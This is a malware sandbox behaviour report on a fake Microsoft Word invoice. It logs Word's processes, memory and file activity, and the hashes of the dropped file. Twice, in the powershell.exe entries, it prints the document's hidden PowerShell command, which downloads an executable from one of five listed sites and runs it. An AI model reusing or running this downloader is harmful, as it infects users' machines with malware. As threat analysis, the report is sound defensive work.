Fake Microsoft Word Invoice Analysis | Grouped Behavior
Involved Hosts

Host Resolved to Country City Protocol
72.52.246.64 US Lansing IPPROTO_TCP
69.65.3.206 US Arlington Heights IPPROTO_TCP
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
(Host: 135, Network: 0)
Information Value
ID #1
File Name c:\program files (x86)\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:00:30, Reason: Analysis Target
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:02:29
OS Process Information
Information Value
PID 0x974
Parent PID 0x494 (c:\windows\explorer.exe)
File Name c:\program files (x86)\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
For performance reasons, the remaining 412 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Thread (1)
Operation Additional Information Success Count Logfile
Create process_name = c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Memory (94)
Operation Additional Information Success Count Logfile
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Protect c:\program files (x86)\microsoft office\root\office16\winword.exe True 1 Fn
Module (31)
Operation Additional Information Success Count Logfile
Load module_name = VBE7.DLL, base_address = 1960968192 True 15 Fn
Get Address module_name = Unknown module name, function = _MsoMultiByteToWideChar@24, address_out = 1727055465 True 1 Fn
Get Address module_name = Unknown module name, function = 712, address_out = 1963130104 True 3 Fn
Get Address module_name = Unknown module name, function = 709, address_out = 1963128984 True 3 Fn
Get Address module_name = Unknown module name, function = 717, address_out = 1963062441 True 3 Fn
Get Address module_name = Unknown module name, function = 616, address_out = 1961510594 True 3 Fn
Get Address module_name = Unknown module name, function = 600, address_out = 1961329478 True 3 Fn
Process #2: powershell.exe
(Host: 511, Network: 104)
Information Value
ID #2
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:01:58
OS Process Information
Information Value
PID 0xa94
Parent PID 0x974 (c:\program files (x86)\microsoft office\root\office16\winword.exe)
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
system.transactions.dll 0x02760000 0x027a2fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000027c0000 0x027c0000 0x027fffff Private Memory Readable, Writable True False False
private_0x0000000002810000 0x02810000 0x0284ffff Private Memory Readable, Writable True False False
private_0x0000000002850000 0x02850000 0x028effff Private Memory Readable, Writable True False False
private_0x0000000002920000 0x02920000 0x0295ffff Private Memory Readable, Writable, Executable True False False
private_0x0000000002a00000 0x02a00000 0x02a3ffff Private Memory Readable, Writable True False False
private_0x0000000002a40000 0x02a40000 0x02a4ffff Private Memory Readable, Writable True False False
private_0x0000000002a50000 0x02a50000 0x04a4ffff Private Memory Readable, Writable True False False
private_0x0000000004ac0000 0x04ac0000 0x04afffff Private Memory Readable, Writable True False False
system.management.automation.dll 0x04b00000 0x04de1fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll.mui 0x04df0000 0x04eaffff Memory Mapped File Readable, Writable False False False
powershell.exe 0x22160000 0x221d1fff Memory Mapped File Readable, Writable, Executable False False False
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.security.ni.dll 0x642c0000 0x642ecfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.management.ni.dll 0x642f0000 0x643b2fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.ni.dll 0x64560000 0x645fbfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.wsman.management.ni.dll 0x64600000 0x64684fff Memory Mapped File Readable, Writable, Executable True False False
system.configuration.install.ni.dll 0x64690000 0x646b4fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.diagnostics.ni.dll 0x646c0000 0x6470afff Memory Mapped File Readable, Writable, Executable True False False
system.core.ni.dll 0x64710000 0x64944fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.ni.dll 0x64950000 0x651c9fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.dll 0x651d0000 0x654b1fff Memory Mapped File Readable, Writable, Executable False False False
microsoft.powershell.consolehost.ni.dll 0x654c0000 0x65540fff Memory Mapped File Readable, Writable, Executable True False False
system.ni.dll 0x65550000 0x65cebfff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x65cf0000 0x667e7fff Memory Mapped File Readable, Writable, Executable True False False
msvcr80.dll 0x66870000 0x6690afff Memory Mapped File Readable, Writable, Executable False False False
mscorwks.dll 0x66950000 0x66efafff Memory Mapped File Readable, Writable, Executable True False False
shdocvw.dll 0x66ed0000 0x66efdfff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x67370000 0x6737afff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x67380000 0x67398fff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x673a0000 0x6740ffff Memory Mapped File Readable, Writable, Executable False False False
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x68220000 0x6826bfff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x68d70000 0x68d90fff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x68da0000 0x68e94fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x68f60000 0x68f9afff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x691b0000 0x69229fff Memory Mapped File Readable, Writable, Executable True False False
cryptsp.dll 0x73600000 0x73615fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x73620000 0x73669fff Memory Mapped File Readable, Writable, Executable True False False
profapi.dll 0x73ab0000 0x73abafff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x73ac0000 0x73ad6fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73f80000 0x73f87fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73f90000 0x73febfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ff0000 0x7402efff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x74590000 0x74599fff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x74cd0000 0x74ce3fff Memory Mapped File Readable, Writable, Executable False False False
linkinfo.dll 0x74d80000 0x74d88fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x750d0000 0x750d8fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x75310000 0x7538ffff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x753a0000 0x753abfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x753b0000 0x7540ffff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75420000 0x754a2fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75630000 0x7568ffff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756a0000 0x756b1fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x756c0000 0x757cffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x757d0000 0x757e8fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75800000 0x75845fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x75850000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x758a0000 0x758a4fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x758b0000 0x75a4cfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75a50000 0x75adffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75c60000 0x75d5ffff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x75d60000 0x75d86fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x75df0000 0x75e7efff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75e80000 0x75f6ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x761a0000 0x761f6fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76200000 0x7635bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76360000 0x76fa9fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76fb0000 0x7707bfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x77140000 0x771ebfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x77310000 0x773acfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x773b0000 0x7744ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077450000 0x77450000 0x7756efff Private Memory Readable, Writable, Executable True False False
private_0x0000000077570000 0x77570000 0x77669fff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77670000 0x77818fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x77820000 0x77829fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77850000 0x779cffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 106 entries are omitted.
The remaining entries can be found in flog.txt.
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe 271.50 KB (278016 bytes) MD5: 4a9bf49040bccb972dc64a0976039de2, SHA1: 6d67e6b649505a5fc58145c89d066e8e716fddca, SHA256: 2b7f82d1063d449f64f0ca84e5bf90a895c42154d715aabae0ca06043f238234 False
Host Behavior
File (220)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2 Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 6 Fn
Create C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
Get Info False 2 Fn
Get Info False 3 Fn
Get Info False 2 Fn
Get Info False 2 Fn
Get Info False 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml False 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml False 2 Fn
Get Info False 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml False 2 Fn
Get Info False 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml False 2 Fn
Get Info False 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml False 2 Fn
Get Info False 1 Fn
Get Info False 5 Fn
Get Info False 4 Fn
Get Info False 8 Fn
Get Info False 2 Fn
Get Info False 1 Fn
Get Info False 1 Fn
Get Info False 1 Fn
Get Info False 1 Fn
Get Info False 1 Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config False 2 Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size_out = 0 False 1 Fn
Get Info False 2 Fn
Get Info False 6 Fn
Get Info C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe False 2 Fn
Open STD_INPUT_HANDLE True 1 Fn
Open STD_OUTPUT_HANDLE True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1 Fn, Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 1 Fn, Data
Write size = 207 True 1 Fn, Data
Write CONOUT$ size = 291 True 1 Fn, Data
Write CONOUT$ size = 1 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 4096 True 11 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 6708 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 8972 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 11876 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 13328 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 4356 True 2 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 18876 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 24944 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 8712 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 6068 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 40656 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 27848 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 24684 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 27588 True 1 Fn, Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 3988 True 1 Fn, Data
Registry (209)
Operation Key Additional Information Success Count Logfile
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
